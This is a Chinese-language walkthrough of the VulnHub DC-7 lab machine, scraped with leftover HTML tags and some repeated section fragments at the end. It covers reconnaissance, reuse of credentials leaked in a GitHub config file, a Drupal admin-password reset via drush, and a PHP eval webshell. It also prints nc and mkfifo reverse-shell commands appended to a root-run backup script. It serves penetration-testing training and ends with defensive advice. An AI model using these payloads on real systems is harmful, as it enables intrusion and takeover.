DC-7 靶机渗透测试详细教程<\/h1>

1. 靶机信息与环境准备<\/h2>

靶机名称：DC-7<\/li>
下载地址：https:\/\/www.vulnhub.com\/entry\/dc-7,356\/<\/li>
难度等级：中等<\/li>

测试环境：VMware\/VirtualBox 虚拟机环境<\/li> <\/ul>

2. 信息收集阶段<\/h2>

2.1 主机发现<\/h3>

使用以下命令进行主机发现：<\/p>

arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 10.1.2.0\/24
<\/span><\/span><\/code><\/pre>2.2 端口扫描<\/h3>
对目标IP(假设为10.1.2.237)进行全端口扫描：<\/p>
nmap -p- 10.1.2.237
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp - SSH服务<\/li>
80\/tcp - HTTP服务<\/li>
<\/ul>
2.3 服务版本探测<\/h3>
详细探测服务信息：<\/p>
nmap -p80 -sV -A 10.1.2.237
<\/span><\/span><\/code><\/pre>2.4 目录爆破<\/h3>
使用dirsearch进行目录爆破：<\/p>
dirsearch -u http:\/\/10.1.2.237\/ -i 200<\/span>
<\/span><\/span><\/code><\/pre>3. Web应用分析<\/h2>
3.1 指纹识别<\/h3>
识别Web应用指纹：<\/p>
whatweb http:\/\/10.1.2.237\/
<\/span><\/span><\/code><\/pre>3.2 源码审计<\/h3>

在网页左下角发现作者信息<\/li>
根据作者信息在GitHub搜索相关项目<\/li>
在GitHub仓库中找到config.php配置文件，内容如下：<\/li>
<\/ol>
<?<\/span>php<\/span> 
<\/span><\/span>$servername =<\/span> "localhost"<\/span>;
<\/span><\/span>$username =<\/span> "dc7user"<\/span>;
<\/span><\/span>$password =<\/span> "MdR3xOgB7#dW"<\/span>;
<\/span><\/span>$dbname =<\/span> "Staff"<\/span>;
<\/span><\/span>$conn =<\/span> mysqli_connect<\/span>($servername, $username, $password, $dbname);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 初始访问获取<\/h2>
4.1 SSH登录尝试<\/h3>
使用发现的凭据尝试SSH登录：<\/p>
ssh dc7user@10.1.2.237
<\/span><\/span># 密码: MdR3xOgB7#dW<\/span>
<\/span><\/span><\/code><\/pre>成功获取初始shell访问权限。<\/p>
5. 权限提升路径<\/h2>
5.1 检查系统信息<\/h3>

查找具有SUID权限的文件：<\/li>
<\/ol>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>
检查用户邮件：<\/li>
<\/ol>
cat \/var\/mail\/dc7user
<\/span><\/span><\/code><\/pre>在邮件中发现重要信息，指向备份脚本。<\/p>
5.2 分析备份脚本<\/h3>
查看\/opt\/scripts\/backups.sh脚本：<\/p>
ls -l \/opt\/scripts\/backups.sh
<\/span><\/span>cat \/opt\/scripts\/backups.sh
<\/span><\/span><\/code><\/pre>发现脚本属主为root，属组为www-data，且脚本中使用了drush命令。<\/p>
5.3 利用drush修改密码<\/h3>

了解drush命令：<\/li>
<\/ol>
drush help
<\/span><\/span><\/code><\/pre>
修改Drupal管理员密码：<\/li>
<\/ol>
drush user-password admin --password=<\/span>"admin"<\/span>
<\/span><\/span><\/code><\/pre>
如果报错，切换到网站目录再次执行。<\/li>
<\/ol>
5.4 访问Drupal后台<\/h3>

使用新密码(admin\/admin)登录Drupal后台<\/li>
导航到"扩展"部分<\/li>
<\/ol>
6. 获取Webshell<\/h2>
6.1 安装PHP模块<\/h3>
由于Drupal 8默认不支持PHP代码执行，需要安装PHP模块：<\/p>


下载PHP模块：<\/p>

项目页面：https:\/\/www.drupal.org\/project\/php<\/li>
下载地址：https:\/\/ftp.drupal.org\/files\/projects\/php-8.x-1.0.tar.gz<\/li>
<\/ul>
<\/li>

在Drupal后台"扩展"中安装该模块<\/p>
<\/li>
<\/ol>
6.2 添加PHP代码<\/h3>

编辑页面内容，添加PHP代码：<\/li>
<\/ol>
<?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
保存时选择"PHP code"格式<\/li>
<\/ol>
6.3 使用蚁剑连接<\/h3>
使用中国蚁剑等工具连接webshell，获取www-data权限。<\/p>
7. 权限提升至root<\/h2>
7.1 反弹shell<\/h3>

在webshell中执行反弹命令：<\/li>
<\/ol>
nc -e \/bin\/bash 10.1.2.228 8888<\/span>
<\/span><\/span><\/code><\/pre>
在攻击机监听：<\/li>
<\/ol>
nc -lvnp 8888<\/span>
<\/span><\/span><\/code><\/pre>
获取稳定shell：<\/li>
<\/ol>
python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>
<\/span><\/span><\/code><\/pre>7.2 利用备份脚本提权<\/h3>

将反弹shell命令追加到备份脚本：<\/li>
<\/ol>
echo "nc -e \/bin\/bash 10.1.2.228 6666"<\/span> >> \/opt\/scripts\/backups.sh
<\/span><\/span># 或<\/span>
<\/span><\/span>echo "rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f | \/bin\/sh -i 2>&1 | nc 10.1.2.228 6666 >\/tmp\/f"<\/span> >> \/opt\/scripts\/backups.sh
<\/span><\/span><\/code><\/pre>

等待脚本执行（可能是计划任务）或直接执行脚本<\/p>
<\/li>

在攻击机监听6666端口，获取root shell<\/p>
<\/li>
<\/ol>
8. 渗透测试总结<\/h2>
完整攻击链：<\/p>

主机发现 → 端口扫描 → 目录爆破<\/li>
发现后台 → 服务探测 → 白盒测试(源码审计)<\/li>
找到配置文件 → SSH远程登录<\/li>
检查邮件信息 → 发现备份脚本<\/li>
利用drush命令 → 修改后台密码<\/li>
进入后台 → 安装PHP模块 → getshell<\/li>
反弹shell → 修改备份脚本 → 提权至root<\/li>
<\/ol>
9. 关键点总结<\/h2>

信息收集<\/strong>：全面的信息收集是渗透测试的基础<\/li>
源码审计<\/strong>：白盒测试中源码审计可以快速发现敏感信息<\/li>
凭证复用<\/strong>：Web应用凭据可能在系统层面复用<\/li>
邮件检查<\/strong>：系统邮件往往包含重要信息<\/li>
备份脚本分析<\/strong>：自动化脚本可能是提权的关键点<\/li>
Drupal模块利用<\/strong>：了解CMS特性有助于突破限制<\/li>
计划任务利用<\/strong>：利用系统自动化任务实现权限提升<\/li>
<\/ol>
10. 防御建议<\/h2>

避免在源码中硬编码敏感信息<\/li>
实施最小权限原则<\/li>
定期审计系统脚本和计划任务<\/li>
保持CMS和插件更新<\/li>
使用强密码且避免凭据复用<\/li>
限制SSH访问<\/li>
监控系统日志和异常行为<\/li>
<\/ol>

DC-7 靶机渗透测试详细教程<\/h1>

2. 信息收集阶段<\/h2>

3. Web应用分析<\/h2>

4. 初始访问获取<\/h2>

5. 权限提升路径<\/h2>

6. 获取Webshell<\/h2>

6.3 使用蚁剑连接<\/h3> 使用中国蚁剑等工具连接webshell，获取www-data权限。<\/p>

7. 权限提升至root<\/h2>

10. 防御建议<\/h2> 避免在源码中硬编码敏感信息<\/li> 实施最小权限原则<\/li> 定期审计系统脚本和计划任务<\/li> 保持CMS和插件更新<\/li> 使用强密码且避免凭据复用<\/li> 限制SSH访问<\/li> 监控系统日志和异常行为<\/li> <\/ol>

6.3 使用蚁剑连接<\/h3>
使用中国蚁剑等工具连接webshell，获取www-data权限。<\/p>

10. 防御建议<\/h2>

避免在源码中硬编码敏感信息<\/li>
实施最小权限原则<\/li>
定期审计系统脚本和计划任务<\/li>
保持CMS和插件更新<\/li>
使用强密码且避免凭据复用<\/li>
限制SSH访问<\/li>
监控系统日志和异常行为<\/li> <\/ol>